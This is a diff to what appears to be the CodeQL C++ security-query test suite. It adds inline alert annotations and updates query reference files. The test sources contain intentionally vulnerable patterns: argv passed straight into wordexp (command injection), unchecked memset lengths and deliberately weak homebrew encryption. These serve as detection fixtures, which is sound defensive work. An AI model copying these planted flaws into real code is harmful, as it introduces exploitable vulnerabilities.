.../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- .../Security/CWE/CWE-120/semmle/tests/tests.c | 42 ++-- .../CWE/CWE-120/semmle/tests/tests2.cpp | 14 +- .../CWE/CWE-120/semmle/tests/unions.c | 4 +- .../CWE-120/semmle/tests/var_size_struct.cpp | 2 +- .../CWE/CWE-120/semmle/tests/varbuffer.c | 22 +- .../tests/UnterminatedVarargsCall.qlref | 3 +- .../CWE/CWE-121/semmle/tests/more_tests.cpp | 10 +- .../Security/CWE/CWE-121/semmle/tests/tests.c | 8 +- ...Based_Buffer_Overflow__c_CWE129_fgets_01.c | 4 +- .../ImproperArrayIndexValidation.expected | 4 +- .../ImproperArrayIndexValidation.qlref | 3 +- .../ImproperArrayIndexValidation.expected | 10 +- .../ImproperArrayIndexValidation.qlref | 3 +- .../ImproperArrayIndexValidation/test1.c | 10 +- .../NoSpaceForZeroTerminator.qlref | 3 +- 
.../CWE-131/NoSpaceForZeroTerminator/test.c | 8 +- .../CWE-131/NoSpaceForZeroTerminator/test.cpp | 18 +- .../NoSpaceForZeroTerminator/test2.cpp | 8 +- .../SAMATE/UncontrolledFormatString.expected | 8 +- .../SAMATE/UncontrolledFormatString.qlref | 3 +- ...char_connect_socket_w32_vsnprintf_01_bad.c | 4 +- .../SAMATE/char_console_fprintf_01_bad.c | 4 +- .../SAMATE/char_environment_fprintf_01_bad.c | 4 +- .../CWE/CWE-134/semmle/argv/argvLocal.c | 50 ++--- .../CWE-134/semmle/argv/argvLocal.expected | 50 ++--- .../CWE/CWE-134/semmle/argv/argvLocal.qlref | 3 +- .../semmle/consts/NonConstantFormat.expected | 48 ++--- .../semmle/consts/NonConstantFormat.qlref | 3 +- .../CWE/CWE-134/semmle/consts/consts.cpp | 40 ++-- .../CWE/CWE-134/semmle/funcs/funcsLocal.c | 30 +-- .../CWE-134/semmle/funcs/funcsLocal.expected | 18 +- .../CWE/CWE-134/semmle/funcs/funcsLocal.qlref | 3 +- .../UncontrolledFormatString.expected | 12 +- .../globalVars/UncontrolledFormatString.qlref | 3 +- .../CWE-134/semmle/globalVars/globalVars.c | 12 +- .../Security/CWE/CWE-134/semmle/ifs/ifs.c | 24 +-- .../CWE/CWE-134/semmle/ifs/ifs.expected | 24 +-- .../Security/CWE/CWE-134/semmle/ifs/ifs.qlref | 3 +- .../CWE-190/SAMATE/ArithmeticTainted.expected | 4 +- .../CWE-190/SAMATE/ArithmeticTainted.qlref | 3 +- .../SAMATE/ArithmeticUncontrolled.expected | 26 +-- .../SAMATE/ArithmeticUncontrolled.qlref | 3 +- .../SAMATE/ArithmeticWithExtremeValues.qlref | 3 +- .../SAMATE/IntegerOverflowTainted.qlref | 3 +- .../Security/CWE/CWE-190/SAMATE/examples.cpp | 12 +- .../ArithmeticUncontrolled.expected | 56 ++--- .../ArithmeticUncontrolled.qlref | 3 +- .../semmle/ArithmeticUncontrolled/test.c | 36 ++-- .../semmle/ArithmeticUncontrolled/test.cpp | 56 ++--- .../ArithmeticWithExtremeValues.qlref | 3 +- .../semmle/ArithmeticWithExtremeValues/test.c | 12 +- .../ComparisonWithWiderType.qlref | 3 +- .../semmle/ComparisonWithWiderType/test.c | 34 +-- .../TaintedAllocationSize.expected | 42 ++-- .../TaintedAllocationSize.qlref | 3 +- 
.../semmle/TaintedAllocationSize/test.cpp | 62 +++--- .../semmle/tainted/ArithmeticTainted.expected | 24 +-- .../semmle/tainted/ArithmeticTainted.qlref | 3 +- .../tainted/IntegerOverflowTainted.qlref | 3 +- .../CWE/CWE-190/semmle/tainted/main.cpp | 2 +- .../CWE/CWE-190/semmle/tainted/test.c | 6 +- .../CWE/CWE-190/semmle/tainted/test2.cpp | 16 +- .../CWE/CWE-190/semmle/tainted/test3.c | 4 +- .../CWE/CWE-190/semmle/tainted/test4.cpp | 2 +- .../CWE/CWE-190/semmle/tainted/test5.cpp | 8 +- .../CWE/CWE-190/semmle/tainted/test6.cpp | 6 +- ...gnedDifferenceExpressionComparedZero.qlref | 3 +- .../test.cpp | 34 +-- .../CWE/CWE-193/InvalidPointerDeref.qlref | 2 +- .../IntegerOverflowTainted.qlref | 3 +- .../SAMATE/IntegerOverflowTainted/tests.cpp | 2 +- .../tests/DangerousFunctionOverflow.qlref | 3 +- .../semmle/tests/DangerousUseOfCin.qlref | 3 +- .../CWE-242/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- .../CWE/CWE-242/semmle/tests/tests.cpp | 78 +++---- .../CWE/CWE-253/HResultBooleanConversion.c | 22 +- .../CWE/CWE-253/HResultBooleanConversion.cpp | 22 +- .../CWE-253/HResultBooleanConversion.qlref | 3 +- .../AuthenticationBypass.expected | 14 +- .../AuthenticationBypass.qlref | 3 +- .../semmle/AuthenticationBypass/test.cpp | 20 +- .../CWE/CWE-295/SSLResultConflation.qlref | 3 +- .../CWE/CWE-295/SSLResultNotChecked.qlref | 3 +- .../query-tests/Security/CWE/CWE-295/test.cpp | 18 +- .../Security/CWE/CWE-295/test2.cpp | 8 +- .../tests/CleartextBufferWrite.expected | 6 +- .../semmle/tests/CleartextBufferWrite.qlref | 3 +- .../semmle/tests/CleartextFileWrite.expected | 32 +-- .../semmle/tests/CleartextFileWrite.qlref | 3 +- .../tests/CleartextTransmission.expected | 82 +++---- .../semmle/tests/CleartextTransmission.qlref | 3 +- .../CWE/CWE-311/semmle/tests/test.cpp | 10 +- .../CWE/CWE-311/semmle/tests/test2.cpp | 28 +-- .../CWE/CWE-311/semmle/tests/test3.cpp | 110 +++++----- 
.../CWE/CWE-319/UseOfHttp/UseOfHttp.expected | 14 +- .../CWE/CWE-319/UseOfHttp/UseOfHttp.qlref | 3 +- .../Security/CWE/CWE-319/UseOfHttp/test.cpp | 14 +- .../CWE/CWE-326/InsufficientKeySize.expected | 8 +- .../CWE/CWE-326/InsufficientKeySize.qlref | 3 +- .../query-tests/Security/CWE/CWE-326/test.cpp | 6 +- .../CWE/CWE-327/BrokenCryptoAlgorithm.qlref | 3 +- .../query-tests/Security/CWE/CWE-327/test.cpp | 2 +- .../Security/CWE/CWE-327/test2.cpp | 2 +- .../CWE-367/semmle/TOCTOUFilesystemRace.qlref | 3 +- .../Security/CWE/CWE-367/semmle/test2.cpp | 32 +-- .../IteratorToExpiredContainer.qlref | 3 +- .../tests/IteratorToExpiredContainer/test.cpp | 12 +- .../tests/UseAfterFree/UseAfterFree.expected | 30 +-- .../tests/UseAfterFree/UseAfterFree.qlref | 3 +- .../semmle/tests/UseAfterFree/test.cpp | 52 ++--- .../UseOfStringAfterLifetimeEnds.qlref | 4 +- .../UseOfStringAfterLifetimeEnds/test.cpp | 26 +-- .../UseOfUniquePointerAfterLifetimeEnds.qlref | 3 +- .../UseOfUniquePtrAfterLifetimeEnds/test.cpp | 20 +- .../CWE/CWE-428/UnsafeCreateProcessCall.cpp | 26 +-- .../CWE/CWE-428/UnsafeCreateProcessCall.qlref | 3 +- .../ConditionallyUninitializedVariable.qlref | 3 +- .../examples.cpp | 2 +- .../test.cpp | 4 +- .../semmle/tests/UninitializedLocal.expected | 30 +-- .../semmle/tests/UninitializedLocal.qlref | 3 +- .../CWE/CWE-457/semmle/tests/errors.cpp | 4 +- .../CWE/CWE-457/semmle/tests/test.cpp | 52 ++--- .../IncorrectPointerScaling.qlref | 3 +- .../IncorrectPointerScalingChar.qlref | 3 +- .../IncorrectPointerScalingVoid.qlref | 3 +- .../semmle/IncorrectPointerScaling/test.cpp | 18 +- .../SuspiciousAddWithSizeof.qlref | 3 +- .../SuspiciousAddWithSizeof/buildless.cpp | 4 +- .../semmle/SuspiciousAddWithSizeof/test.cpp | 14 +- .../CWE-497/SAMATE/ExposedSystemData.expected | 2 +- .../CWE-497/SAMATE/ExposedSystemData.qlref | 3 +- .../PotentiallyExposedSystemData.expected | 4 +- .../SAMATE/PotentiallyExposedSystemData.qlref | 3 +- .../Security/CWE/CWE-497/SAMATE/tests.c | 4 +- 
.../PotentiallyExposedSystemData.expected | 36 ++-- .../tests/PotentiallyExposedSystemData.qlref | 3 +- .../CWE/CWE-497/semmle/tests/tests.cpp | 38 ++-- .../CWE/CWE-497/semmle/tests/tests_passwd.cpp | 6 +- .../IncorrectAllocationErrorHandling.qlref | 3 +- .../query-tests/Security/CWE/CWE-570/test.cpp | 40 ++-- .../Security/CWE/CWE-611/XXE.expected | 62 +++--- .../Security/CWE/CWE-611/XXE.qlref | 3 +- .../Security/CWE/CWE-611/tests.cpp | 40 ++-- .../Security/CWE/CWE-611/tests2.cpp | 12 +- .../Security/CWE/CWE-611/tests3.cpp | 20 +- .../Security/CWE/CWE-611/tests4.cpp | 10 +- .../Security/CWE/CWE-611/tests5.cpp | 22 +- .../DangerousUseOfCin/DangerousUseOfCin.qlref | 3 +- .../CWE-676/SAMATE/DangerousUseOfCin/test.cpp | 2 +- .../DangerousUseOfCin/DangerousUseOfCin.qlref | 3 +- .../CWE-676/semmle/DangerousUseOfCin/test.cpp | 2 +- .../DangerousFunctionOverflow.qlref | 3 +- .../PotentiallyDangerousFunction.qlref | 3 +- .../PotentiallyDangerousFunction/test.c | 12 +- .../CWE/CWE-732/OpenCallMissingModeArgument.c | 8 +- .../CWE-732/OpenCallMissingModeArgument.qlref | 3 +- .../CWE-732/UnsafeDaclSecurityDescriptor.cpp | 6 +- .../UnsafeDaclSecurityDescriptor.qlref | 3 +- .../semmle/tests/DiningPhilosophers.cpp | 10 +- .../CWE-764/semmle/tests/LockOrderCycle.qlref | 3 +- .../CWE-764/semmle/tests/TwiceLocked.qlref | 3 +- .../CWE-764/semmle/tests/UnreleasedLock.qlref | 3 +- .../CWE/CWE-764/semmle/tests/test.cpp | 38 ++-- .../CWE-772/SAMATE/FileMayNotBeClosed.qlref | 3 +- .../CWE/CWE-772/SAMATE/FileNeverClosed.qlref | 3 +- .../CWE-772/SAMATE/MemoryMayNotBeFreed.qlref | 3 +- .../CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref | 3 +- .../Security/CWE/CWE-772/SAMATE/tests.cpp | 14 +- .../tests-file/FileMayNotBeClosed.qlref | 3 +- .../semmle/tests-file/FileNeverClosed.qlref | 3 +- .../CWE/CWE-772/semmle/tests-file/test.cpp | 34 +-- .../tests-memory/MemoryMayNotBeFreed.qlref | 3 +- .../tests-memory/MemoryNeverFreed.qlref | 3 +- .../CWE/CWE-772/semmle/tests-memory/test.cpp | 52 ++--- 
.../TaintedCondition.expected | 4 +- .../TaintedCondition/TaintedCondition.qlref | 3 +- .../CWE-807/semmle/TaintedCondition/test.cpp | 4 +- ...teLoopWithUnsatisfiableExitCondition.qlref | 3 +- .../test.cpp | 10 +- .../CWE/CWE-843/TypeConfusion.expected | 20 +- .../Security/CWE/CWE-843/TypeConfusion.qlref | 3 +- .../query-tests/Security/CWE/CWE-843/test.cpp | 36 ++-- .../query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../query-tests/definitions/definitions.qlref | 2 +- .../AV Rule 1/AV Rule 1.c | 2 +- .../AV Rule 1/AV Rule 1.qlref | 3 +- .../AV Rule 13/AV Rule 13.qlref | 3 +- .../jsf/4.04 Environment/AV Rule 13/test.cpp | 4 +- .../AV Rule 32/AV Rule 32.qlref | 3 +- .../AV Rule 32/test.c | 2 +- .../AV Rule 35/AV Rule 35.qlref | 2 +- .../AV Rule 53 54/AV Rule 53.1.qlref | 3 +- .../4.09 Style/AV Rule 53 54/AV Rule 53.qlref | 2 +- .../4.09 Style/AV Rule 53 54/AV Rule 54.qlref | 2 +- .../jsf/4.09 Style/AV Rule 53 54/test.c | 2 +- .../4.10 Classes/AV Rule 73/AV Rule 73.cpp | 2 +- .../4.10 Classes/AV Rule 73/AV Rule 73.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 73/original.cpp | 4 +- .../4.10 Classes/AV Rule 76/AV Rule 76.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 76/test.cpp | 6 +- .../AV Rule 77.1/AV Rule 77.1.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 77.1/test.cpp | 2 +- .../4.10 Classes/AV Rule 78/AV Rule 78.cpp | 6 +- .../4.10 Classes/AV Rule 78/AV Rule 78.qlref | 3 +- .../4.10 Classes/AV Rule 79/AV Rule 79.cpp | 16 +- .../4.10 Classes/AV Rule 79/AV Rule 79.qlref | 3 +- .../4.10 Classes/AV Rule 79/Container2.cpp | 2 +- .../4.10 Classes/AV Rule 79/DeleteThis.cpp | 8 +- .../AV Rule 79/ExternalOwners.cpp | 2 +- .../jsf/4.10 Classes/AV Rule 79/Lambda.cpp | 2 +- .../4.10 Classes/AV Rule 79/ListDelete.cpp | 2 +- .../4.10 Classes/AV Rule 79/NoDestructor.cpp | 2 +- .../4.10 Classes/AV Rule 79/PlacementNew.cpp | 2 +- .../AV Rule 79/SelfRegistering.cpp | 2 +- .../jsf/4.10 Classes/AV Rule 79/Variants.cpp | 10 +- .../jsf/4.10 
Classes/AV Rule 79/Wrapped.cpp | 4 +- .../4.10 Classes/AV Rule 82/AV Rule 82.cpp | 8 +- .../4.10 Classes/AV Rule 82/AV Rule 82.qlref | 3 +- .../4.10 Classes/AV Rule 85/AV Rule 85.cpp | 10 +- .../4.10 Classes/AV Rule 85/AV Rule 85.qlref | 3 +- .../4.10 Classes/AV Rule 97/AV Rule 97.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 97/jsf97.cpp | 10 +- .../AV Rule 107/AV Rule 107.qlref | 3 +- .../jsf/4.13 Functions/AV Rule 107/test.c | 8 +- .../AV Rule 114/AV Rule 114.qlref | 3 +- .../jsf/4.13 Functions/AV Rule 114/complex.c | 4 +- .../jsf/4.13 Functions/AV Rule 114/test.c | 6 +- .../jsf/4.13 Functions/AV Rule 114/test.cpp | 16 +- .../AV Rule 145/AV Rule 145.qlref | 3 +- .../4.16 Initialization/AV Rule 145/test.c | 6 +- .../AV Rule 157/AV Rule 157.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 157/test.c | 6 +- .../AV Rule 164/AV Rule 164.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 164/test.c | 16 +- .../AV Rule 165/AV Rule 165.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 165/test.c | 18 +- .../AV Rule 166/AV Rule 166.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 166/test.c | 4 +- .../AV Rule 176/176.cpp | 10 +- .../AV Rule 176/176.qlref | 3 +- .../AV Rule 186/AV Rule 186.qlref | 3 +- .../AV Rule 186/test.c | 4 +- .../AV Rule 193/AV Rule 193.c | 4 +- .../AV Rule 193/AV Rule 193.qlref | 3 +- .../AV Rule 193/nested.c | 4 +- .../AV Rule 193/test.c | 12 +- .../AV Rule 196/AV Rule 196.c | 8 +- .../AV Rule 196/AV Rule 196.qlref | 3 +- .../AV Rule 201/AV Rule 201.c | 22 +- .../AV Rule 201/AV Rule 201.qlref | 3 +- .../AV Rule 201/NestedLoopSameVar.qlref | 3 +- .../AV Rule 201/StructMembers.cpp | 4 +- .../AV Rule 210/AV Rule 210.c | 10 +- .../AV Rule 210/AV Rule 210.qlref | 3 +- 789 files changed, 4121 insertions(+), 3814 deletions(-) diff --git a/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref b/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref index 57f35c3bcf2d..e24890cc9a86 100644 --- a/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref 
+++ b/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 107.ql +query: jsf/4.13 Functions/AV Rule 107.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref b/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref index 0267b31251d3..326ddde08d3e 100644 --- a/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref +++ b/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +query: Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp b/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp index 034291f4d197..babe4a7fced2 100644 --- a/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp +++ b/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp @@ -48,7 +48,7 @@ void test1() void test2() { - Lock myLock(); // BAD (interpreted as a function declaration, this does nothing) + Lock myLock(); // BAD (interpreted as a function declaration, this does nothing) // $ Alert[cpp/function-in-block] // ... } @@ -62,14 +62,14 @@ void test3() void test4() { - Lock(myMutex); // BAD (creates an uninitialized variable called `myMutex`, probably not intended) + Lock(myMutex); // BAD (creates an uninitialized variable called `myMutex`, probably not intended) // $ Alert[cpp/local-variable-hides-global-variable] // ... } void test5() { - Lock myLock(Mutex); // BAD (interpreted as a function declaration, this does nothing) + Lock myLock(Mutex); // BAD (interpreted as a function declaration, this does nothing) // $ Alert[cpp/function-in-block] // ... } diff --git a/cpp/ql/test/examples/expressions/PrintAST.qlref b/cpp/ql/test/examples/expressions/PrintAST.qlref index 6fcb30ac7a6e..645e39136f5b 100644 
--- a/cpp/ql/test/examples/expressions/PrintAST.qlref
+++ b/cpp/ql/test/examples/expressions/PrintAST.qlref
@@ -1 +1 @@
-semmle/code/cpp/PrintAST.ql
\ No newline at end of file
+query: semmle/code/cpp/PrintAST.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref
index a4543b332ddb..b88242c72ab1 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql
+query: experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref
index e9107625d293..b0ca696135e2 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql
+query: experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c
index 40fb688fb203..4a1ceb2ec8a6 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c @@ -3,6 +3,6 @@ void workFunction_0(char *s) { char buf[80], buf1[8]; if(len<0) return; memset(buf,0,len); //GOOD - memset(buf1,0,len1); //BAD + memset(buf1,0,len1); //BAD // $ Alert if(len1<0) return; } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected index e3afe00da6ef..b03a1ff7040e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | edges | test.cpp:22:27:22:30 | **argv | test.cpp:23:20:23:26 | *access to array | provenance | | | test.cpp:23:20:23:26 | *access to array | test.cpp:29:13:29:20 | *filePath | provenance | | @@ -6,5 +8,3 @@ nodes | test.cpp:23:20:23:26 | *access to array | semmle.label | *access to array | | test.cpp:29:13:29:20 | *filePath | semmle.label | *filePath | subpaths -#select -| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref index ecff539f3e63..d58923728783 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE/CWE-078/WordexpTainted.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-078/WordexpTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp index 0ae98b8f1632..7c8224ce6534 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp @@ -19,14 +19,14 @@ enum { int wordexp(const char *restrict s, wordexp_t *restrict p, int flags); -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source char *filePath = argv[2]; { // BAD: the user string is injected directly into `wordexp` which performs command substitution wordexp_t we; - wordexp(filePath, &we, 0); + wordexp(filePath, &we, 0); // $ Alert } { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref index 22dae13892f8..c3c257615c32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql +query: experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp index 4f862a324e59..bd7e8f40d74c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp 
@@ -20,7 +20,7 @@ void myFclose(FILE * fmy) int main(int argc, char *argv[]) { fe = fopen("myFile.txt", "wt"); - fclose(fe); // BAD + fclose(fe); // BAD // $ Alert fe = fopen("myFile.txt", "wt"); myFclose(fe); // GOOD return 0; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref index 6da5822f7f02..2a1e44064547 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql +query: experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c index 47d89188e6b4..fc078db7924c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c @@ -11,7 +11,7 @@ void workFunction_0(char *s) { while(intIndex > 2) { buf[intIndex] = 1; - int intIndex; // BAD + int intIndex; // BAD // $ Alert intIndex--; } intIndex = 10; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref index ddf0380834b1..30a603676bb1 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1240/CustomCryptographicPrimitive.ql +query: experimental/Security/CWE/CWE-1240/CustomCryptographicPrimitive.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp index 6aa1bbe06a7f..56dd45e3a64a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp @@ -8,7 +8,7 @@ int strlen(const char *string); // the following function is homebrew crypto written for this test. This is a bad algorithm // on multiple levels and should never be used in cryptography. -void encryptString(char *string, unsigned int key) { +void encryptString(char *string, unsigned int key) { // $ Alert char *ptr = string; int len = strlen(string); @@ -27,7 +27,7 @@ void encryptString(char *string, unsigned int key) { // the following function is homebrew crypto written for this test. This is a bad algorithm // on multiple levels and should never be used in cryptography. -void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int dataSize, unsigned int key[2]) { +void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int dataSize, unsigned int key[2]) { // $ Alert unsigned int state[2]; unsigned int t; 
@@ -48,7 +48,7 @@ void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int d // the following function resembles an implementation of the AES "mix columns" // step. It is not accurate, efficient or safe and should never be used in // cryptography. -void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { +void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { // $ Alert // The "mix columns" step takes four bytes as inputs. Each byte represents a // polynomial with 8 one-bit coefficients, e.g. input bits 00001101 // represent the polynomial x^3 + x^2 + 1. Arithmetic is reduced modulo @@ -80,7 +80,7 @@ void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { // the following function resembles initialization of an S-box as may be done // in an implementation of DES, AES and other encryption algorithms. It is not // accurate, efficient or safe and should never be used in cryptography. -void init_aes_sbox(unsigned char data[256]) { +void init_aes_sbox(unsigned char data[256]) { // $ Alert // initialize `data` in a loop using lots of ^, ^= and << operations and // a few fixed constants. unsigned int state = 0x12345678; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref index 228684a4e250..9c9b71af695a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql +query: experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
